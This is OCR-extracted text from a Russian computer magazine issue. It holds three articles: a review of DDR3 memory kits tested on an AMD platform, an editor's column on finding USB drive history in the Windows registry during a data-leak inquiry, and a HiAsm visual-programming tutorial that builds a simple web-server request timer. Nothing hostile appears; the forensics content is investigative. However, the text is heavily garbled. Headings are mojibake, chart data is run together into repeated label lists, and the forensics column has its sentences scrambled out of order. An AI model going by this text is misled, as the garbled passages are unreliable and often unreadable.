Скорее всего это связано с не самым большим объемом, но факт остается
фактом: время отклика — самое лучшее в тесте. Ну и, конечно же, привлекательная цена этих модулей и установленные на них радиаторы.

Объем, который, вероятно, стал причиной высокой скорости работы этой
памяти, все-таки сегодня довольно мал — ну что такое 2 Гб? Хотя, если
ты ярый фанат Windows XP, то тебе он подойдет. Но для остальных будет
явно мал. Номинальная частота составляет 1800 МГц, а номинальные
тайминги равны 9, что весьма скромно смотрится на фоне восьмерок
конкурентов при частоте 2200 МГц. Показатель записи данных в память
также оказался весьма небольшим.
XÀÊÅÐ 10 /141/ 10

APACER GIANT II
DK 04GAS F1QK2
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 2048
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 2200
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 10-10-10-30
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1,65
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

А вот этот комплект памяти от Apacer вследствие более высокого объема
заслуживает гораздо более пристального внимания. Все-таки 4 Гб
сегодня достаточно даже для работы новейшей Windows 7, то есть этим
комплектом можно не только модернизировать компьютер, но и установить его и только его в новую машину. На первое время точно хватит.
Кроме того, данный набор обладает самым высоким результатом в тесте
на копирование данных в память, а установленные на нем алюминиевые
радиаторы позволят избежать перегрева.

Как и у младшего по объемам брата, тайминги этого комплекта заставляли нас содрогнуться. К счастью, платформа AMD гораздо менее, чем
Intel, чувствительна к данному параметру, поэтому в данной ситуации это
не столь критично. Еще одна проблема, правда, не комплекта напрямую,
вызвана тем, что найти его в российской рознице будет весьма проблематично.

021

FERRUM

7500 ðóá.

10300 ðóá.

CORSAIR DOMINATOR
GTX CMGTX2
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 1024
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 2250
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 8-8-8-24
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1,65
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

Сразу скажем, что это самый быстрый комплект в нашем сегодняшнем
тесте. Даже его внешний вид весьма агрессивен за счет черно-красного радиатора, который, помимо того, что радует взгляд, еще и весьма
эффективно охлаждает модули памяти. Заявленные базовые тайминги
8-8-8-24 при частоте 2250 МГц выглядят очень впечатляюще. Несмотря
на то, что мы проводили тест этих модулей с частотой 1792 МГц, результаты во всех тестах получились весьма впечатляющими, а итоговый бал
в PCMark Vantage стал вообще лучшим во всем тесте. Как вы яхту назовете, как говорится — буквы GTX в названии этого комплекта стоят явно не
только для красоты.

Несмотря на высокую скорость, два гигабайта — это два гигабайта. Конечно, ими можно дополнить аналогичную память, они не помешают, но
ставить только их в новую систему — это весьма сомнительный вариант.
Цена комплекта достаточно высока.

022

KINGMAX HERCULES
FLKE85F-B8KJA FEIH
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 2048
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 2200
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 10-10-10-30
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1,5
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

Объем 4 Гб, которого сегодня вполне хватает, броский дизайн модулей,
а также самое низкое номинальное напряжение в обзоре (да и вообще,
далеко не каждая память может похвастаться 1,5 В) являются несомненными плюсами этого комплекта. К сожалению, несмотря на все это, для
платформы AMD эта память совершенно не подходит. Возможно, правда,
что в связке с процессором Intel она проявит себя гораздо лучше.

К сожалению, недостатки комплекта существенно перевешивают его достоинства, как по количеству, так и по качеству. Это и тайминги, и невысокие результаты в тестах (скорость записи в память не смогла перевалить
рубеж в 7 Гб/сек). Ну, а про крайне высокую цену и говорить нечего.

XÀÊÅÐ 10 /141/ 10

7000 ðóá.

13000 ðóá.

KINGSTON HYPERX
KHX2000C8D3T1K2/4GX

KINGSTON HYPERX
KHX2133C8D3T1K2/4GX

ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 2048
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 2000
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 8-8-8-24
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1,65
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

У компании Kingston, как ни крути, имеется огромный опыт в разработке
и производстве оперативной памяти, поэтому не стоит удивляться тому,
что этот комплект получился весьма и весьма впечатляющим, а также
удостоился высокой награды нашего теста. Объем его вполне достаточен, результаты тестов высоки, а в WinRAR он вообще стал лидером
теста, также как и в чтении из памяти. Серия HyperX снова доказала свои
скоростные преимущества. Ввиду таких итогов можно смело сказать, что
цена набора вполне адекватна, и мы смело рекомендуем его покупателям. Кстати, на частоте 2000 МГц с таймингами 8-8-8-24 он заработал, но
только в одноканальном режиме…

Выискивать недостатки у такой памяти — дело весьма и весьма неблагодарное, по той причине, что их у нее нет. Надо отдать должное инженерам Kingston, которые создали скоростное, взвешенное и недорогое
решение.

ÂÛÂÎÄÛ

М ы у б е д и л и с ь , ч то н а п л ат ф о р м е A M D б ол е е в а ж н ы н е м е га ге р ц ы п а м я т и , а б а л а н с м е ж д у н и м и и та й м и н га м и . Ти т ул
XÀÊÅÐ 10 /141/ 10

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 2048
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 2133
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 8-8-8-24
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1,65
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

Внешних, да и содержательных отличий у двух комплектов памяти от
Kingston, присутствующих в нашем тесте, весьма немного. Точнее, внешне они вообще идентичны. Те же самые синие радиаторы, которые помогают модулям избежать перегрева. Как видно из графиков, результаты
тестирования обоих комплектов очень близки. Поэтому истинная разница
между ними заключается в цене, а также в повешенной на 133 МГц
номинальной частоты у данного набора.

Но, учитывая ограничения платформы AMD, 2133 МГц тебе получить не удастся, поэтому вдвое (по сравнению с Kingston HyperX
KHX2000C8D3T1K2/4GX) переплачивать смысла нет никакого. Как видно
из графика, частота стабильной работы у двух этих модулей абсолютно
одинаковая.

« В ы б о р р е д а к ц и и » с е год н я д о ста е тс я ко м п л е к т у K i n g st o n
H y p e r X K H X 2 0 0 0 C 8 D 3 T 1 K 2 / 4 GX , з а е го в ы д а ю щ и е с я х а р а к те р и ст и к и . А « Л у ч ш а я п о к у п ка » — это A p a ce r G i a n t I I ( D K
0 2 GA L F 9 Q K 2 ) . z

023

ÊÎÏÈÐÎÂÀÍÈÅ Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 2000 C8D3T1K2/4GX Kingston KHX 2133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 2000 C8D3T1K2/4GX Kingston KHX 2133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 0 5 10 15 20 25 30 35 40 45 50 2500 0 2000 4000 6000 8000 10000 12000 В тесте на копирование разница между лучшим и худшим результатом составила всего 5% Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 2000 C8D3T1K2/4GX Kingston KHX 2133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 0 2000 4000 6000 8000 В лидерах — память от Apacer. однако разница между результатами участников не превышает 3% ËÀÒÅÍÒÍÎÑÒÜ Как правило. в котором комплект от Transcend выигрывает у аутсайдера аж секунду! 0 500 EVEREST. ×ÒÅÍÈÅ Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 2000 C8D3T1K2/4GX Kingston KHX 2133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 1500 Казалось бы. ÇÀÏÈÑÜ EVEREST. что и подтвердил данный тест 1000 10000 12000 0 1000 2000 3000 4000 5000 6000 7000 8000 Этот тест нагляднее всего отражает разницу между участниками XÀÊÅÐ 10 /141/ 10 . нагрузка ложится не только на память.FERRUM ÌÀÊÑÈÌÀËÜÍÎ ÑÒÀÁÈËÜÍÀß ×ÀÑÒÎÒÀ PCMARK Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 2000 C8D3T1K2/4GX Kingston KHX 2133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 0 500 1000 1500 2000 Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 2000 C8D3T1K2/4GX Kingston KHX 2133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 0 500 1000 1500 2000 2500 3000 3500 4000 4500 Лучшего результата по частоте удалось добиться с младшим комплектом от Apacer Поскольку данный бенчмарк имитирует выполнение реальных задач. Corsair и Kingston 024 2000 EVEREST. но и на центральный процессор ÐÅÇÓËÜÒÀÒ Â SUPERPI ÐÅÇÓËÜÒÀÒ Â WINRAR Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 2000 C8D3T1K2/4GX Kingston KHX 2133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 2000 C8D3T1K2/4GX Kingston KHX 2133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 0 5 10 15 20 25 30 Лучший тест на стабильность работы. архивирование — процесс очень чувствительный к скорости памяти. модули с большим объемом отличаются более высокой латентностью.

Список накопителей.sys). которое мы часто обходим стороной. которые когда-либо подключались к компьютеру. между тем. информация обо всех внешних накопителях. Далее в работу вступает менеджер монтирования (MountMgr. У человека же. логируется и записывается в реестр. На английском языке есть замечательная книжка «Windows Forensic Analysis» (Harlan Carvey). используя чаще всего обычный USB-драйвер USB Driver USBSTOR. после чего один из подозреваемых просто сознался. какие внешние накопители подключались в систему. что такие ключи были у всех сотрудников. была поставлена непростая — выяснить. что происходит. Основной интерес forensic — отыскать различного рода доказательства. который запрашивает у девайса его уникальные идентификационные данные — это серийный номер. Мало того. Но. кто имел доступ к компьютеру. Сначала менеджер PnP распознает девайс и устанавливает его. согласись. он создает в реестре несколько ключей. По правде говоря. как может показаться на первый взгляд. Еще некоторое время ушло на изучение пендрайвов сотрудников. который не был подключен в сеть. Реестр — это вообще непаханое поле для следствия. Давай разберемся.USB Flash Drive USB Device [. В упомянутой ветке реестра фиксируется время. которые подключаются к компьютеру. Если отыскать здесь ключ. Весь это клад данных хранится здесь: HKLM\ SYSTEM\CurrentControlSet\Enum\USBSTOR. уже был бы неплохим результатом. при этом никакого журнала авторизаций не велось. что из компании каким-то образом утекли некоторые данные. Практически любая активность в системе. а эти данные очень пригодились бы. сразу появился план решения проблемы. когда флешка была подключена впервые. которого наняли для проведения небольшого информационного аудита. на которых могли быть украдены данные. Когда из реестра были вытащены все данные о подключенных носителях. скрытые и удаленные файлы. так или иначе.USB Device instanceID: 1001178901b3f6&0 ParentIdPrefix: Driver:{4d36e967-e325-11ce-bfc108002be10318}\0032 Disk Stamp: 03/28/2010 18:10 olume Stamp: 11/03/2009 17:26 (2) --. Печально в этой истории то.PC_ZONE Степан «Step» Ильин twitter. В ветке HKEY_ LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\DeviceClasses\{53f56307-b6bf-11d094f2-00a0c91efb8b} есть множество ключей определенного формата. быстро определился список тех флешек. Оказывается. проходящих в рамках какого-то следствия. Вот такое вот маленькое следствие. относящийся к конкретной флешке (а это делается по специальному идентификатору). Тема это довольно обширная. написав утилиту usbHistory (sourceforge. логи действий на компьютере. разбирает их значения и выводит информацию в удобочитаемом виде: USB History Dump by nabiy (c)2008 (1) --. Вот и в нашем случае из реестра можно выудить не только различные данные о том. когда 025 Результат работы usbHistory Данные из реестра были произведены последние подключения. В результате для каждого подключенного носителя в реестре есть отдельная ветка с информацией о нем. Файлы осознанно хранились только на одном компьютере. где мы рассказывали об инструментах.com/stepah Êîëîíêà ðåäàêòîðà Есть интересное направление в информационной безопасности. Как только они получены. информация о продукте и производителя.] Вся информация — как на ладони. когда к компьютеру подключается внешний накопитель. и многое здесь совсем не так очевидно. И в этом ему помогла сама Windows. я бы сходу едва ли смог что-то придумать. гораздо лучше знать еще и когда флешки были подключены в систему. Хочу тебе поведать историю. Я говорю о forensics. которым «снаружи» светиться было крайне нежелательно.SYS. z XÀÊÅÐ 10 /141/ 10 . оставляет следы в реестре. В нашей же ситуации энтузиасты сильно упростили задачу. которые позволяют системе дальше работать с флешкой.net/ projects/usbhistory). В #100 номере ][ у нас была замечательная статья «Попался: твой компьютер у них в руках». А задача. интересная. в котором подробно изучаются подобные методы извлечения данных. Она сама извлекает данные. и если у него есть подключ Control. но нет данных о том. рассказанную мне одним знакомым специалистом по ИБ. что может косвенно быть полезным или подтвердить какие-то факты. парсит все необходимые ключи в реестре. которые используются специалистами для исследования компьютеров. программа считывает его. который профессионально занимается forensic. Авторизация была реализована с помощью USB-ключей и какой-то самопальной программы по схеме «вставляешь флешку со специальным ключом в USB-порт. Все началось с того. Но и здесь выручает реестр.. сопоставлены даты последних подключений и версии опубликованного документа. то из него как раз и можно извлечь время последнего подключения. когда ее подключали в последний раз. Не лишним будет рассказать конец истории с утечкой конфиденциальных документов. и разлочивает систему». history браузера и все-все.

ÇÍÀÊÎÌÜÒÅÑÜ — HIASM HiAsm — среда визуального программирования. позволяющих визуализировать все этапы разработки ПО — от проектирования внешнего вида до реализации программного ядра — LabView. используемый шрифт. Как это выглядит? Сейчас разберемся. как это делается в классических языках. складывает два числа. который выполняет какое-то достаточно простое и узкоспециализированное действие (например. óäîáíûé ïàðñåð èíôîðìàöèè è ìíîãîå äðóãîå ìîæíî ñîçäàòü áåç åäèíîé ñòðî÷êè êîäà. Горизонтальные линии между элементами (или просто «связи») определяют логику будущей программы (то есть последовательность вызова событий и методов. то увидим исходник. Внешний вид схемы. Машинный язык мнемонических команд был полностью завязан на архитектуру процессора. определяющие его положение на форме. C и другие.PC_ZONE Dilma support@hiasm. последней волной стало появление сред.п. Собранное приложение состоит из двух элементов: Кнопка (Button) и Сообщение (Message). реализующей данный функционал. 026 и т. в том числе Delphi и C++. которая при нажатии кнопки выводит на экран соответствующее сообщение. которое позволило еще проще описывать объекты реального мира терминами мира виртуального и породило букет языков следующего поколения. Гораздо больше времени потребовалось на осмысление. у элемента «Кнопка» есть свойства. одной связи между ними (проложенную от события нажатия кнопки к методу показа сообщения) и одного измененного свойства Message (с текстом «Hello world!»).com Âèçóàëüíûé ïðîãðàììèíã Êîíñòðóèðóåì ïðèëîæåíèÿ ñ ïîìîùüþ HiAsm Äëÿ òîãî ÷òîáû íàïèñàòü ïîëåçíîå ïðèëîæåíèå. который сгенерировала HiAsm: Make(delphi) Add(MainForm. Каждый такой кубик представляет собой элемент. понимание и реализацию объектноориентированного подхода (ООП) в программировании. но при этом стал одним из первых общеиспользуемых языков программирования. SoftWire и прочие. программы в которой не пишутся. абстрагирующие программиста от аппаратной части: Basic. Также у каждого элемента есть набор уникальных свойств. представлен на рисунке. а проектируются из кубиков и линий связей между ними. копирует файл. Íåñëîæíóþ ñåòåâóþ óòèëèòó. Наконец. Åñëè ïîä ðóêîé åñòü êîíñòðóêòîð ïðèëîæåíèé. какие данные откуда брать. качает файл из интернета и т. заголовок. ïàíåëü äëÿ óïðàâëåíèÿ ðîóòåðîì. если выражаться терминами классических языков программирования). которое использовалось исключительно в конструкторах форм и интерфейсов. протягиванию связей между ними и настройке (если необходимо) их свойств.105) { XÀÊÅÐ 10 /141/ 10 . Поэтому весь процесс конструирования сводится к расстановке элементов. Вертикальные же связи указывают элементам на то. но если заглянуть в исходник. íåîáÿçàòåëüíî çíàòü êàêîé-òî ñëîæíûé ÿçûê ïðîãðàììèðîâàíèÿ. как выглядит нарисованная таким образом программа классического «Hello world!». текст выводимой подсказки и прочие). Pascal. Мы не пишем ни одной строчки кода. которые определяют особенности его функционирования (к примеру.2953706. Все когда-то начиналось с Ассемблера.д.). Среды для этих языков впервые стали вводить в обиход понятие «визуальное программирование». HiAsm. Посмотрим. под который писалась программа. Позже появились языки высокого уровня.21. проигрывает звук.

с которой получает данные для отправки на сервер. после отправки запроса элемент «TCP-клиент» в асинхронном режиме принимает ответ сервера и выдает его в поток на правую точку onRead. • первым происходит событие onEvent1. • элемент «Разветвитель». • WEB — целевой язык PHP с поддержкой JavaScript и HTML.134.. Этот метод в процессе своей работы задействует верхнюю точку Data.238. В его свойство Strings запишем текст HTTP-запроса для получения содержимого корня сайта: GET / HTTP/1. В схеме был также использован элемент «Разветвитель (Hub)».». в свою очередь. Для этого вытаскиваем с вкладки «Интернет» элемент с именем «TCP-клиент». который находится на вкладке «Инструменты» и занимается только тем. HiAsm представляет собой не более чем графический векторный редактор. На текущий момент времени самым мощным из них является пакет Windows.ru и измерять время. • после того. которая по нажатию кнопки на форме отправит только один запрос и выведет его содержимое на экран. • QT — целевой язык C++ для платформ Windows. • и. который умеет хранить многострочный текст. hiasm. далее выбираем «Windows Æ Приложение Windows». Также в статусе «just for fun» существует online-версия HiAsm (hion. Для начала соберем простую схему.ru по 80 порту. что и как у нас происходит в схеме после нажатия кнопки на форме: • элемент «Кнопка» генерирует внутреннее событие onClick (единственная точка на его правой стороне). с помощью которой можно поучиться составлять схемы. первый этап. как уже было написано выше.1 Host: ya. кото- 027 . возвращает текст. что последовательно вызывает два события справа при вызове метода слева.ru Connection: close <ïóñòàÿ ñòðîêà> <ïóñòàÿ ñòðîêà> Обрати внимание на то.189. в примере выше текст запроса можно было поместить в свойство Data элемента «Кнопка».3. но есть и другие варианты. то есть заголовок запроса к серверу. а элемент «Список строк» удалить совсем. которая. Для этого откроем HiAsm и создадим новый проект: «Файл Æ Новый. вызывает метод doSend элемента «TCPклиент». которая принимает данные из потока и добавляет их в редактор. Итак.ru — 93. • это событие вызывает метод doEvent1 элемента «Разветвитель». • VBS — целевой язык Basic платформа Windows и прочие менее развитые. который должен начинаться со строки «HTTP/1. как нам это удобно. ÏÈØÅÌ ÒÅÑÒÅÐ ÂÅÁ-ÑÅÐÂÅÐÀ Мы возьмем самый стандартный пакет под Windows (на сайте hiasm. А все его возможности по созданию приложений определяются уставленными пакетами и компиляторами.158.[]) } Add(Message. Теперь запускаем программу и убеждаемся.Схема с размещенными на ней подсказками } Add(Button. которое потребовалось на их выполнение. По сути. так и из потока. com сейчас доступна версия 4.105) { Left=180 Top=110 link(onClick. и управление вернулось в программу. что методы элементов могут принимать данные как со своих верхних точек. Основная задача этой утилиты — отправка запросов веб-серверу на получение данных по указанному URL и измерение времени.147563. которое вызывает метод doOpen элемента «TCP-клиент». использующий в качестве целевого языка Object Pascal для компиляторов FPC и Delphi. имея под рукой лишь браузер. которое на это ушло. Скажем.105) { Message="Hello world!!!" } Сгенерированный код написан на языке Object Pascal. В его свойствах указываем стандартный порт для XÀÊÅÐ 10 /141/ 10 Внешний вид приложения в редакторе форм HTTP-сервера — 80. что после нажатия кнопки нам приходит ответ от сервера. • точка onRead соединена с точкой doAdd элемента «Редактор текста». наконец. Вытаскиваем на форму с вкладки «Интерфейс» элементы «Кнопка» и «Редактор текста». Помимо этого существуют следующие пакеты: • PocketPC с целевым языком C++ и компилятором MS ARM для платформы Microsoft Windows Mobile. После нажатия «ОК» переходим в режим редактирования формы «Вид Æ Редактор формы». что избавляет от необходимости прокладывать дополнительные связи и визуально разгружает схему. как соединение установлено. и IP адрес ya.5363509. Теперь попробуем понять. Linux и MacOS. В нашем примере эта точка соединена с нижней точкой Text элемента «Список строк». Теперь осталось соединить все эти элементы так. как показано на рисунке.5363509:doMessage. происходит следующее событие хаба onEvent2. Теперь вытащим элемент. В грамотно спроектированной схеме большинство методов читает нужные им данные именно из потока. При таком включении событие onClick выдало бы эти данные в поток. • оно. Теперь нам нужен элемент. в свою очередь.4) и попробуем написать упрощенный аналог утилиты ab из пакета приложений apache-tools.com).. который умеет соединяться с удаленным сервером по протоколу TCP и отправлять ему некоторые данные. В примере ниже мы будем отправлять по 100 последовательных запросов на адрес http://ya. Именно в этот момент происходит соединение с сервером ya. после чего с помощью редактора форм размещаем их так. Он находится на вкладке «Строки» и называется «Список строк». последовательно вызывает события onEvent1 и onEvent2. Следует обратить внимание на то. что в конце запроса должны стоять две пустые строки. содержащийся в списке.1 200 OK».

а вторым — сравнивать это количество с 100. таким образом. который умеет сравнивать между собой два произвольных значения. что позволит нажимать кнопку отправки запросов несколько раз подряд без рестарта приложения. произойдет событие onDisconnect. отправку запроса и получение данных. Первым мы будем считать количество произошедших событий onDisconnect. После запуска приложения убеждаемся. Помощники -> Отладка(Debug) — позволяет в запущенной программе отслеживать выполнение методов и событий. XÀÊÅÐ 10 /141/ 10 . Память(Memory) — позволяет сохранять данные из потока для последующего использования. с той лишь разницей. Его второй аргумент задан в свойствах и равен 100. На простом языке программирования это можно было бы записать одной строкой: x = x + 1. Этот элемент по своему назначению почти полностью эквивалентен элементу «Разветвитель». Для этого необходимо соединить элементы так. которое ушло на соединение с сервером. что оно отображает время одного запроса. В более сложных схемах всегда бывает по несколько возможных правильных вариантов включения элементов. что между счетчиком и надписью появился еще один хаб со связью. то есть данный участок схемы эквивалентен следующему коду: 028 Схема приложения тестирования сервера (шаг 2) if(x < 100) [âûçûâàåì doEvent1 ó õàáà] else [âûçûâàåì doStop è ñ÷åò÷èêà âðåìåíè] Также можно заметить. в противном случае — отобразит время выполнения задачи. Инструменты: Разветвитель(Hub) — позволяет смешивать несколько параллельных потоков в один или разветвлять один поток на несколько последовательных. Цикл со счетчиком(For) — позволяет заданное число раз выполнить схему.PC_ZONE Схема приложения тестирования сервера (шаг 1) рые. можно приступать к следующему этапу. и элемент «Условный блок». Для этого после наступления onDisconnect нужно вызывать повторное подключение к серверу и отправку запроса до тех пор. который появился на последнем рисунке. которое прошло с момента вызова события doStart до момента вызова события doStop) будет выдано счетчиком в поток вместе с событием onStop. решающих определенную задачу. ÇÀÑÒÀÂËßÅÌ ÂÑÅ ÝÒÎ ÐÀÁÎÒÀÒÜ. Выведем содержимое потока с этого события. Элемент «Арифметика» соединен сам с собой точками Op1 и Result. Если номер итерации меньше 100. который умеет производить простые математические операции. как показано на рисунке. Это элемент «Арифметика». в элемент «Надпись». которое и остановит счетчик. После вычисления следующего значения счетчика результат передается в поток вместе с событием onResult. пройдя через «Разветвитель». когда ты тянешь связь от точки элемента (от onDisconnect. Для этого ставим счетчик между кнопкой и хабом (onClickÆ doStart и onStart Æ doEvent1). Убедившись. Он автоматически ставится на схему в тот момент. При таком включении метод doClear будет обнулять счетчик вызова событий onDisconnect всякий раз после вывода времени на форму. Условный блок(If_else) — позволяет сравнивать два значения между собой. что позволяет в качестве первого аргумента использовать ранее вычисленное значение и. например. В итоге получим схему. а также просматривать данные из потоков. Еще один не столь приметный элемент в виде стрелки. идущей к точке doClear элемента «Арифметика». расположен между событием onStart счетчика времени и методом doEvent1 хаба. к примеру) и сбрасываешь ее на уже существующую ÎÑÍÎÂÍÛÅ ÝËÅÌÅÍÒÛ Ниже привожу несколько основных элементов. а его метод doStop соединяем с событием onDisconnect элемента «TCP-клиент». расположенный на вкладке «Интерфейс» (его лучше всего ставить в режиме Редактора форм). чего не хватает в схеме для выполнения нашей задачи — это отправка запроса 100 раз подряд. что у него может быть всего три входящих потока и один исходящий. что схема работает. идущую после него. когда сервер закроет соединение с нашим приложением. Поток-данные(DoData) — позволяет помещать произвольные данные в поток. Контролы -> Таймер(Timer) — позволяет выполнять кусок схемы через определенные интервалы времени. пока это событие не произойдет сотый раз. представленную на иллюстрации. без которых не обходится почти ни одна схема. Удаляем элемент «Редактор текста» — он нам больше не нужен. В решении этой проблемы нам помогут два новых элемента. которое соединено с методом doCompare элемента «Условный блок». При таком включении в тот момент. и выбор какого-то одного из них будет зависеть от достигнутого компромисса между читабельностью схемы и ее размером. попали бы на doSend. то программа продолжит запросы к серверу. Логика: Арифметика(Math) — позволяет выполнять простые математические операции. вести счет вызова события onDisconnect. Достаем с вкладки «Инструменты» элемент «Счетчик времени». При этом измеренное время (то есть количество миллисекунд. С помощью него мы будем измерять время. находящихся на вкладке «Логика». Последнее.

д. Так.). для которой создается программа. как и любой другой механизм графического программирования. но полезное сетевое приложение. точная цифра целиком и полностью зависит от самого разработчика: так. для которого в качестве среды разработки выгодно выбирать HiAsm. получается более громоздкой. однако. что в палитре пакета есть множество инструментов для масштабирования схемы (разбивка на модули. является менее наглядной. Неоценимый вклад в развитие проекта вносят и простые пользователи. то ее реализация. Но. как это часто бывает. сетевых протоколов. то лучше обратиться к традиционным средам программирования. Помимо этого есть другое ограничение. хоть и графический. Не исключены также схемы со множеством лишних связей и элементов. количества элементов) ведет к сильному падению читабельности схемы и пониманию ее работы из-за образования большого числа связей. простая математическая формула. как такового. Если задача пользователя достаточно сложна и не укладывается в рамки стандартных элементов палитры. отсутствие необходимости в знании языка программирования совершенно не исключает необходимость в знании основ работы операционной системы. но все же в среднем ниже производительности аналогичного решения на компилируемом языке программирования. все недостатки конструктора вытекают из его достоинств. Часть элементов палитры реализует уже готовый функционал для выполнения конкретной часто встречающейся задачи (скажем. Иногда это является неожиданным сюрпризом для пользователя.ru • HiAsm online: hion. ÊÎÃÄÀ ÝÒÎ ÌÎÆÍÎ ÈÑÏÎËÜÇÎÂÀÒÜ? Вот так просто мы создали несложное. что такого не бывает в обычных языках — просто визуальное конструирование к этому располагает в гораздо большей степени. часть которых реализуется в последующих версиях конструктора. а любой код нужно комментировать. операций со строками и прочих «микро» процедур. сравнений. Если же готового элемента нет. например. чем аналогичная запись в текстовом виде хотя бы потому.com • Уроки визуального программирования: my-hiasm. за счет чего многие схемы в HiAsm создаются за гораздо меньшее время. связанное с максимально возможной сложностью проекта. Собственно. ведущий проекта).co 029 . то есть основ той предметной области. собственно. Могу дать следующий совет: если ты считаешь. что схема приложения будет состоять из примерно 500-1000 элементов. в которых требуется производить много расчетов. чем при использовании обычного языка программирования. как правило. что схему из 10 кубиков можно легко превратить в хаос. Будет ли она при этом работать — это уже совсем другой вопрос :). Например. в этом и заключается главное достоинство HiAsm (ради которого. известных под никами dilma (Дмитрий Власов. Отсутствие каких-либо ограничений на расположение и связывание элементов выливается в то. Несмотря на то. nesco (Евгений Носов). то понятия «синтаксическая ошибка».net. математики и физики. реализованная несколькими кубиками. но оставлены в ней только потому. что нужная схема (или близкая к ней) уже есть в примерах. как следствие. которые никак не влияют на работу программы. nic (Николай Березников) и другие. Это.hiasm. не годится для решения задач. регулярно посещающие форум и предлагающие идеи. Производительность получаемого приложения в пакете Windows (именно он рассматривается в данной статье) хоть и сильно зависит от используемого набора элементов. Последний штрих в нашей схеме — размещение плашек-комментариев для большей наглядности происходящего. Это ведь тоже код. официальный сайт и форум HiAsm «нарисован» в нем самом и состоит из примерно 7000 элементов. что занимает на экране больше места. вкладывания в контейнеры и т. iarspider (Иван Разумов).z info Проект HiAsm (или Конструктор программ) — это открытое программное обеспечение. с ходу разобраться в котором не сможет даже опытный разработчик. и был создан конструктор) — в возможности собирать свои собственные программы без знания каких-либо языков программирования. Но при этом. что качество и простота схемного решения обратно пропорциональны сложности элементов. который с самого начала привык получать готовое решение в два клика без заморочек с хелпом и прочими доками. HTTP://WWW links • Блог по HiAsm: hi-asm. Впрочем. для закачки файла из интернета и сохранения его на диске). ÌÀËÅÍÜÊÈÉ ÑÎÂÅÒ HiAsm идеально подходит для конструирования простых утилит. Поскольку в HiAsm приложение строится из готовых блоков и связей между ними. тут нет — при любом расположении и соединении элементов схема будет скомпилирована и запущена. из которых строилось приложение. то велика вероятность того. Это значит. и пользователю останется только слегка изменить ее. Происходит это из-за того. чем аналогичные программы в других языках и средах программирования.blogspot. что «и так все XÀÊÅÐ 10 /141/ 10 работает». не означает. форматов и стандартов. начиная с определенного момента дальнейшее наращивание функционала (и. что для разработки более-менее 